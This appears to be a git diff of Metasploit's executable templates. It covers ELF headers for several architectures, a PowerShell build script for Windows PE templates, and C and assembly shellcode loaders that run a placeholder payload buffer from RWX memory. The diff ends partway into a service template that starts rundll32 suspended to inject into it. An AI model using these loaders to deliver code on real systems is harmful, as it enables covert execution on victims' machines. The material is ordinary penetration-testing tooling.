db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0x102 ; e_machine = LOONGARCH
dd 1 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
global _start
_start:
@@ -0,0 +1,55 @@
; build with:
; nasm elf_mips64_template.s -f bin -o template_mips64_linux.bin
%define WORD_BE(value) (((value & 0xFF) << 8) | ((value >> 8) & 0xFF))
%define DWORD_BE(dword) (((dword & 0xFF) << 24) | \
((dword & 0xFF00) << 8) | \
((dword >> 8) & 0xFF00) | \
((dword >> 24) & 0xFF))
%define QWORD_BE(qword) ( \
((qword & 0x00000000000000FF) << 56) | \
((qword & 0x000000000000FF00) << 40) | \
((qword & 0x0000000000FF0000) << 24) | \
((qword & 0x00000000FF000000) << 8) | \
((qword >> 8) & 0x000000FF00000000) | \
((qword >> 24) & 0x0000FF0000000000) | \
((qword >> 40) & 0x00FF000000000000) | \
((qword >> 56) & 0xFF00000000000000) )
BITS 64
org 0x400000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw WORD_BE(2) ; e_type = ET_EXEC for an executable
dw WORD_BE(0x08) ; e_machine = MIPS
dd 0 ; e_version
dq QWORD_BE(0x400078) ; e_entry
dq QWORD_BE(0x40) ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw WORD_BE(0x40) ; e_ehsize
dw WORD_BE(0x38) ; e_phentsize
dw WORD_BE(0x1) ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd DWORD_BE(1) ; p_type = PT_LOAD
dd DWORD_BE(7) ; p_flags = rwx
dq 0 ; p_offset
dq QWORD_BE(0x400000) ; p_vaddr
dq QWORD_BE(0x400000) ; p_paddr
dq QWORD_BE(0xA00000) ; p_filesz
dq QWORD_BE(0xA00000) ; p_memsz
dq QWORD_BE(0x1000) ; p_align
phdrsize equ $ - phdr
global _start
_start:
+40
View File
@@ -0,0 +1,40 @@
; build with:
; nasm elf_ppc64le_template.s -f bin -o template_ppc64le_linux.bin
BITS 64
org 0x400000
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 2 ; e_type = ET_EXEC for an executable
dw 0x15 ; e_machine = PPC64
dd 0 ; e_version
dq _start ; e_entry
dq phdr - $$ ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 1 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
_start:
dq _start+0x8
@@ -0,0 +1,37 @@
; build with:
; nasm elf_ppc_template.s -f bin -o template_ppc_linux.bin
BITS 32
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x1400 ; e_machine = PPC
dd 0x01000000 ; e_version
dd 0x54100000 ; e_entry
dd 0x34000000 ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw 0x3400 ; e_ehsize
dw 0x2000 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = pt_load
dd 0 ; p_offset
dd 0x00100000 ; p_vaddr
dd 0x00100000 ; p_paddr
dd 0xefbeadde ; p_filesz
dd 0xefbeadde ; p_memsz
dd 0x07000000 ; p_flags = rwx
dd 0x00000100 ; p_align
phdrsize equ $ - phdr
_start:
@@ -0,0 +1,37 @@
; build with:
; nasm elf_ppce500v2_template.s -f bin -o template_ppce500v2_linux.bin
BITS 32
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 1, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x1400 ; e_machine = PPC
dd 0x01000000 ; e_version
dd 0x54100000 ; e_entry
dd 0x34000000 ; e_phoff
dd 0 ; e_shoff
dd 0 ; e_flags
dw 0x3400 ; e_ehsize
dw 0x2000 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
ehdrsize equ $ - ehdr
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = pt_load
dd 0 ; p_offset
dd 0x00100000 ; p_vaddr
dd 0x00100000 ; p_paddr
dd 0xefbeadde ; p_filesz
dd 0xefbeadde ; p_memsz
dd 0x07000000 ; p_flags = rwx
dd 0x00000100 ; p_align
phdrsize equ $ - phdr
_start:
+34
View File
@@ -0,0 +1,34 @@
; build with:
; nasm elf_zarch_template.s -f bin -o template_zarch_linux.bin
BITS 64
ehdr: ; Elf32_Ehdr
db 0x7F, "ELF", 2, 2, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0 ;
dw 0x0200 ; e_type = ET_EXEC for an executable
dw 0x1600 ; e_machine = ZARCH
dd 0x01000000 ; e_version
dq 0x7810000000000000 ; e_entry
dq 0x4000000000000000 ; e_phoff
dq 0 ; e_shoff
dd 0 ; e_flags
dw 0x4000 ; e_ehsize
dw 0x3800 ; e_phentsize
dw 0x0100 ; e_phnum
dw 0 ; e_shentsize
dw 0 ; e_shnum
dw 0 ; e_shstrndx
phdr: ; Elf32_Phdr
dd 0x01000000 ; p_type = PT_LOAD
dd 0x07000000 ; p_flags = rwx
dq 0 ; p_offset
dq 0x0010000000000000 ; p_vaddr
dq 0x0010000000000000 ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x0000100000000000 ; p_align
_start:
+16 -7
View File
@@ -1,10 +1,19 @@
# PE Source Code
This directory contains the source code for the PE executable templates.
## Building DLLs
Use the provided `build_dlls.bat` file, and run it from within the Visual Studio
developer console. The batch file requires that the `%VCINSTALLDIR%` environment
variable be defined (which it should be by default). The build script will
create both the x86 and x64 templates before moving them into the correct
folder. The current working directory when the build is run must be the source
code directory (`pe`).
## Building
Use the provided `build_all.ps1` script from within the Visual Studio developer
console. The script requires that the `%VCINSTALLDIR%` environment variable be
defined (which it should be by default). By default it builds all templates for
both x86 and x64, then moves the outputs into the correct folder.
```powershell
# build everything
.\build_all.ps1
# build only x86
.\build_all.ps1 -Architectures x86
# build only EXE templates
.\build_all.ps1 -Templates exe,exe_service
```
+230
View File
@@ -0,0 +1,230 @@
<#
.SYNOPSIS
Build all PE executable and DLL templates for Metasploit.
.DESCRIPTION
Compiles x86 and x64 variants of the EXE, service EXE, DLL, GDI+ DLL, and
mixed-mode DLL templates using the MSVC toolchain. After linking, the EXE
templates are patched to lower the minimum subsystem version so they can run
on legacy Windows (NT 4.0+ for x86, Server 2003+ for x64). Modern MSVC
linkers enforce a floor of 5.01/5.02 which is too high for those targets.
.PARAMETER Architectures
Which architectures to build. Defaults to both x86 and x64.
.PARAMETER Templates
Which templates to build. Defaults to all of them.
.EXAMPLE
.\build_all.ps1
.\build_all.ps1 -Architectures x86
.\build_all.ps1 -Templates exe,exe_service
#>
param(
[ValidateSet('x86', 'x64')]
[string[]]$Architectures = @('x86', 'x64'),
[ValidateSet('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')]
[string[]]$Templates = @('exe', 'exe_service', 'dll', 'dll_gdiplus', 'dll_mixed_mode')
)
$ErrorActionPreference = 'Stop'
$ScriptDir = Split-Path -Parent $MyInvocation.MyCommand.Path
$OutputDir = Resolve-Path (Join-Path $ScriptDir '..\..')
# Each entry defines only what varies per template. The build function handles
# the common logic: calling cl, optional 256KiB variant, PE version patching.
#
# Dir - subdirectory containing the source
# OutputFmt - output filename format string, {0} is replaced with the architecture
# Source - source file passed to cl
# ClFlags - flags passed to cl (before /link)
# LinkLibs - libraries passed to the linker (after /link)
# LinkRes - optional .res file to link
# EntryPoint - /entry value
# NoDefaultLib - if set, pass /NODEFAULTLIB to the linker
# RcArgs - optional resource compiler arguments (run before cl)
# PatchVersion - if set, patch the PE subsystem version after linking
#
# DLL templates automatically get a 256KiB payload variant built alongside the
# standard size. This is determined by the output extension, not a per-template flag.
$BuildDefs = [ordered]@{
exe = @{
Dir = 'exe'
OutputFmt = 'template_{0}_windows.exe'
Source = 'template.c'
ClFlags = @('/GS-')
LinkLibs = @('kernel32.lib')
EntryPoint = 'main'
NoDefaultLib = $true
PatchVersion = $true
}
exe_service = @{
Dir = 'exe_service'
OutputFmt = 'template_{0}_windows_svc.exe'
Source = 'template.c'
ClFlags = @('/GS-', '/DBUILDMODE=2')
LinkLibs = @('advapi32.lib', 'kernel32.lib')
EntryPoint = 'main'
NoDefaultLib = $true
PatchVersion = $true
}
dll = @{
Dir = 'dll'
OutputFmt = 'template_{0}_windows.dll'
Source = 'template.c'
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2')
LinkLibs = @('kernel32.lib')
LinkRes = 'template.res'
EntryPoint = 'DllMain'
RcArgs = @('/v', 'template.rc')
}
dll_gdiplus = @{
Dir = 'dll_gdiplus'
OutputFmt = 'template_{0}_windows_dccw_gdiplus.dll'
Source = '../dll/template.c'
ClFlags = @('/LD', '/GS-', '/DBUILDMODE=2', '/I', '.', '/FI', 'exports.h')
LinkLibs = @('kernel32.lib')
LinkRes = 'template.res'
EntryPoint = 'DllMain'
RcArgs = @('/v', '/fo', 'template.res', '../dll/template.rc')
}
dll_mixed_mode = @{
Dir = 'dll_mixed_mode'
OutputFmt = 'template_{0}_windows_mixed_mode.dll'
Source = 'template.cpp'
ClFlags = @('/CLR', '/LD', '/GS-', '/I', '..\dll', '/DBUILDMODE=2')
LinkLibs = @('mscoree.lib', 'kernel32.lib')
EntryPoint = 'DllMain'
}
}
if (-not $env:VCINSTALLDIR) {
Write-Error 'VCINSTALLDIR is not set. Run this script from a Visual Studio Developer Command Prompt.'
exit 1
}
function Invoke-VCVars {
param([string]$Arch)
# vcvarsall.bat no-ops if VSCMD_VER is already set, so clear its state
# flags before re-running. Otherwise the second arch silently inherits
# the first arch's toolchain and produces wrong-architecture binaries.
foreach ($v in 'VSCMD_VER', 'VSCMD_ARG_TGT_ARCH', 'VSCMD_ARG_HOST_ARCH') {
[System.Environment]::SetEnvironmentVariable($v, $null, 'Process')
}
$vcvars = Join-Path $env:VCINSTALLDIR 'Auxiliary\Build\vcvarsall.bat'
cmd /c "`"$vcvars`" $Arch >nul 2>&1 && set" 2>&1 | ForEach-Object {
if ($_ -match '^([^=]+)=(.*)$') {
[System.Environment]::SetEnvironmentVariable($matches[1], $matches[2], 'Process')
}
}
}
function Invoke-Cl {
param(
[string[]]$ClFlags,
[string]$Source,
[string]$OutputName,
[string[]]$LinkLibs,
[string]$LinkRes,
[string]$EntryPoint,
[switch]$NoDefaultLib
)
$clArgs = $ClFlags + @($Source, "/Fe:$OutputName", '/link') + $LinkLibs
if ($LinkRes) { $clArgs += $LinkRes }
$clArgs += @("/entry:$EntryPoint", '/subsystem:WINDOWS')
if ($NoDefaultLib) { $clArgs += '/NODEFAULTLIB' }
& cl @clArgs
if ($LASTEXITCODE -ne 0) { Write-Error "cl failed for $OutputName" }
}
function Set-PEVersion {
param(
[string]$Path,
[int]$Major,
[int]$Minor
)
$bytes = [System.IO.File]::ReadAllBytes($Path)
$peOffset = [BitConverter]::ToInt32($bytes, 0x3C)
if ([System.Text.Encoding]::ASCII.GetString($bytes, $peOffset, 4) -ne "PE`0`0") {
Write-Error "$Path is not a valid PE file"
return
}
# PE optional header starts at peOffset + 24. Field offsets from its start:
# +40: MajorOperatingSystemVersion (uint16)
# +42: MinorOperatingSystemVersion (uint16)
# +48: MajorSubsystemVersion (uint16)
# +50: MinorSubsystemVersion (uint16)
# These offsets are identical for PE32 and PE32+.
$opt = $peOffset + 24
$verBytes = [BitConverter]::GetBytes([uint16]$Major)
$minBytes = [BitConverter]::GetBytes([uint16]$Minor)
$bytes[$opt + 40] = $verBytes[0]; $bytes[$opt + 41] = $verBytes[1]
$bytes[$opt + 42] = $minBytes[0]; $bytes[$opt + 43] = $minBytes[1]
$bytes[$opt + 48] = $verBytes[0]; $bytes[$opt + 49] = $verBytes[1]
$bytes[$opt + 50] = $minBytes[0]; $bytes[$opt + 51] = $minBytes[1]
[System.IO.File]::WriteAllBytes($Path, $bytes)
Write-Host " Patched OS and subsystem version to ${Major}.${Minor}"
}
function Build-Template {
param([string]$Arch, [string]$Name)
$def = $BuildDefs[$Name]
Push-Location (Join-Path $ScriptDir $def.Dir)
try {
if ($def.RcArgs) {
& rc @($def.RcArgs)
if ($LASTEXITCODE -ne 0) { throw "rc failed for $Name ($Arch)" }
}
$outName = $def.OutputFmt -f $Arch
Invoke-Cl -ClFlags $def.ClFlags -Source $def.Source -OutputName $outName `
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
if ($Name -like 'dll*') {
$outName256 = $outName -replace '(\.\w+)$', '.256kib$1'
Invoke-Cl -ClFlags ($def.ClFlags + '/DSCSIZE=262144') -Source $def.Source -OutputName $outName256 `
-LinkLibs $def.LinkLibs -LinkRes $def.LinkRes `
-EntryPoint $def.EntryPoint -NoDefaultLib:([bool]$def.NoDefaultLib)
}
} finally { Pop-Location }
if ($def.PatchVersion) {
$outPath = Join-Path $ScriptDir "$($def.Dir)\$outName"
if ($Arch -eq 'x86') {
Set-PEVersion -Path $outPath -Major 4 -Minor 0
} else {
Set-PEVersion -Path $outPath -Major 5 -Minor 2
}
}
}
# Build each requested template for each architecture
foreach ($arch in $Architectures) {
Write-Host "`n=== Configuring for $arch ===" -ForegroundColor Cyan
Invoke-VCVars $arch
foreach ($tmpl in $Templates) {
Write-Host "`nBuilding: $tmpl ($arch)" -ForegroundColor Green
Build-Template -Arch $arch -Name $tmpl
}
}
# Clean intermediate files and move outputs
Write-Host "`n=== Cleaning up ===" -ForegroundColor Cyan
Get-ChildItem $ScriptDir -Recurse -File |
Where-Object { $_.Extension -in '.obj', '.res', '.exp', '.lib' } |
Remove-Item -Force
Write-Host "`n=== Moving outputs to $OutputDir ===" -ForegroundColor Cyan
Get-ChildItem $ScriptDir -Recurse -File |
Where-Object { $_.Extension -in '.exe', '.dll' } |
ForEach-Object {
Move-Item $_.FullName (Join-Path $OutputDir $_.Name) -Force
Write-Host " $($_.Name)"
}
Write-Host "`nDone." -ForegroundColor Green
-7
View File
@@ -1,7 +0,0 @@
@echo off
for /D %%d in (dll*) do (
pushd "%%d"
build.bat
popd
)
-15
View File
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rc /v template.rc
cl /LD /GS- /DBUILDMODE=2 template.c /Fe:template_%1_windows.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 template.c /Fe:template_%1_windows.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj *.res
move *.dll ..\..\..
@@ -1,15 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
rc /v /fo template.res ../dll/template.rc
cl /LD /GS- /DBUILDMODE=2 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
cl /LD /GS- /DBUILDMODE=2 /DSCSIZE=262144 /I . /FI exports.h ../dll/template.c /Fe:template_%1_windows_dccw_gdiplus.256kib.dll /link kernel32.lib template.res /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.exp *.lib *.res *.obj
move *.dll ..\..\..
@@ -1,14 +0,0 @@
@echo off
if "%~1"=="" GOTO NO_ARGUMENTS
echo Compiling for: %1
call "%VCINSTALLDIR%Auxiliary\Build\vcvarsall.bat" %1
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 template.cpp /Fe:template_%1_windows_mixed_mode.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
cl /CLR /LD /GS- /I ..\dll /DBUILDMODE=2 /DSCSIZE=262144 template.cpp /Fe:template_%1_windows_mixed_mode.256kib.dll /link mscoree.lib kernel32.lib /entry:DllMain /subsystem:WINDOWS
exit /B
:NO_ARGUMENTS
%COMSPEC% /c "%0" x86
%COMSPEC% /c "%0" x64
del *.obj
move *.dll ..\..\..
@@ -1,26 +0,0 @@
Microsoft Visual Studio Solution File, Format Version 10.00
# Visual C++ Express 2008
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "service", "service.vcproj", "{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Release|Win32 = Release|Win32
Release|x64 = Release|x64
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.ActiveCfg = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|Win32.Build.0 = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.ActiveCfg = Release|x64
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Release|x64.Build.0 = Release|x64
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.ActiveCfg = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|Win32.Build.0 = Release|Win32
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.ActiveCfg = Debug|x64
{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}.Debug|x64.Build.0 = Debug|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -1,343 +0,0 @@
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="9.00"
Name="service"
ProjectGUID="{BED052CD-AD84-45E2-9F9D-2C1D8FE4813F}"
RootNamespace="service"
Keyword="Win32Proj"
TargetFrameworkVersion="196613"
>
<Platforms>
<Platform
Name="Win32"
/>
<Platform
Name="x64"
/>
</Platforms>
<ToolFiles>
</ToolFiles>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="4"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Debug|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="0"
PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS"
MinimalRebuild="true"
BasicRuntimeChecks="3"
RuntimeLibrary="3"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
LinkIncremental="2"
GenerateDebugInformation="true"
SubSystem="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|Win32"
OutputDirectory="$(SolutionDir)$(ConfigurationName)"
IntermediateDirectory="$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
RuntimeLibrary="0"
BufferSecurityCheck="false"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CallingConvention="2"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="../../../../service.exe"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="1"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
<Configuration
Name="Release|x64"
OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
ConfigurationType="1"
CharacterSet="2"
WholeProgramOptimization="1"
>
<Tool
Name="VCPreBuildEventTool"
/>
<Tool
Name="VCCustomBuildTool"
/>
<Tool
Name="VCXMLDataGeneratorTool"
/>
<Tool
Name="VCWebServiceProxyGeneratorTool"
/>
<Tool
Name="VCMIDLTool"
TargetEnvironment="3"
/>
<Tool
Name="VCCLCompilerTool"
Optimization="1"
EnableIntrinsicFunctions="true"
FavorSizeOrSpeed="2"
PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS"
RuntimeLibrary="0"
BufferSecurityCheck="false"
EnableFunctionLevelLinking="true"
UsePrecompiledHeader="0"
WarningLevel="3"
DebugInformationFormat="3"
CallingConvention="2"
CompileAs="1"
/>
<Tool
Name="VCManagedResourceCompilerTool"
/>
<Tool
Name="VCResourceCompilerTool"
/>
<Tool
Name="VCPreLinkEventTool"
/>
<Tool
Name="VCLinkerTool"
OutputFile="../../../../template_x64_windows_svc.exe"
LinkIncremental="1"
GenerateManifest="false"
GenerateDebugInformation="false"
SubSystem="2"
OptimizeReferences="2"
EnableCOMDATFolding="2"
TargetMachine="17"
/>
<Tool
Name="VCALinkTool"
/>
<Tool
Name="VCManifestTool"
/>
<Tool
Name="VCXDCMakeTool"
/>
<Tool
Name="VCBscMakeTool"
/>
<Tool
Name="VCFxCopTool"
/>
<Tool
Name="VCAppVerifierTool"
/>
<Tool
Name="VCPostBuildEventTool"
/>
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Source Files"
Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
>
<File
RelativePath=".\service.c"
>
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>
+7 -7
View File
@@ -1,11 +1,11 @@
#include <stdio.h>
#include <windows.h>
#define SCSIZE 4096
char payload[SCSIZE] = "PAYLOAD:";
char bPayload[SCSIZE] = "PAYLOAD:";
char comment[512] = "";
int main(int argc, char **argv) {
(*(void (*)()) payload)();
return(0);
void main() {
DWORD dwOldProtect;
VirtualProtect(bPayload, SCSIZE, PAGE_EXECUTE_READWRITE, &dwOldProtect);
(*(void (*)()) bPayload)();
return;
}
File diff suppressed because one or more lines are too long
@@ -1,32 +0,0 @@
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Architecture: x64
;
; Assemble and link with the following command:
; "C:\Program Files\Microsoft Visual Studio 9.0\VC\bin\x86_amd64\ml64" template_x64_windows.asm /link /subsystem:windows /defaultlib:"C:\Program Files\Microsoft SDKs\Windows\v6.0A\Lib\x64\kernel32.lib" /entry:main
extrn ExitProcess : proc
extrn VirtualAlloc : proc
.code
main proc
sub rsp, 40 ;
mov r9, 40h ;
mov r8, 3000h ;
mov rdx, 4096 ;
xor rcx, rcx ;
call VirtualAlloc ; lpPayload = VirtualAlloc( NULL, 4096, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE );
mov rcx, 4096 ;
mov rsi, payload ;
mov rdi, rax ;
rep movsb ; memcpy( lpPayload, payload, 4096 );
call rax ; lpPayload();
xor rcx, rcx ;
call ExitProcess ; ExitProcess( 0 );
main endp
payload proc
A byte 'PAYLOAD:'
B db 4096-8 dup ( 0 )
payload endp
end
@@ -1,16 +1,28 @@
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#define PAYLOAD_SIZE 8192
#define SCSIZE 8192
char cServiceName[32] = "SERVICENAME";
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";
char bPayload[SCSIZE] = "PAYLOAD:";
SERVICE_STATUS ss;
SERVICE_STATUS_HANDLE hStatus = NULL;
#if BUILDMODE == 2
/* hand-rolled bzero allows us to avoid including ms vc runtime */
void inline_bzero(void *p, size_t l)
{
BYTE *q = (BYTE *)p;
size_t x = 0;
for (x = 0; x < l; x++)
*(q++) = 0x00;
}
#endif
/*
*
*/
@@ -34,9 +46,9 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
PROCESS_INFORMATION pi;
LPVOID lpPayload = NULL;
ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
ZeroMemory( &si, sizeof(STARTUPINFO) );
ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
inline_bzero( &ss, sizeof(SERVICE_STATUS) );
inline_bzero( &si, sizeof(STARTUPINFO) );
inline_bzero( &pi, sizeof(PROCESS_INFORMATION) );
si.cb = sizeof(STARTUPINFO);
@@ -47,7 +59,7 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;
hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
if ( hStatus )
{
ss.dwCurrentState = SERVICE_RUNNING;
@@ -57,30 +69,30 @@ VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
{
Context.ContextFlags = CONTEXT_FULL;
GetThreadContext( pi.hThread, &Context );
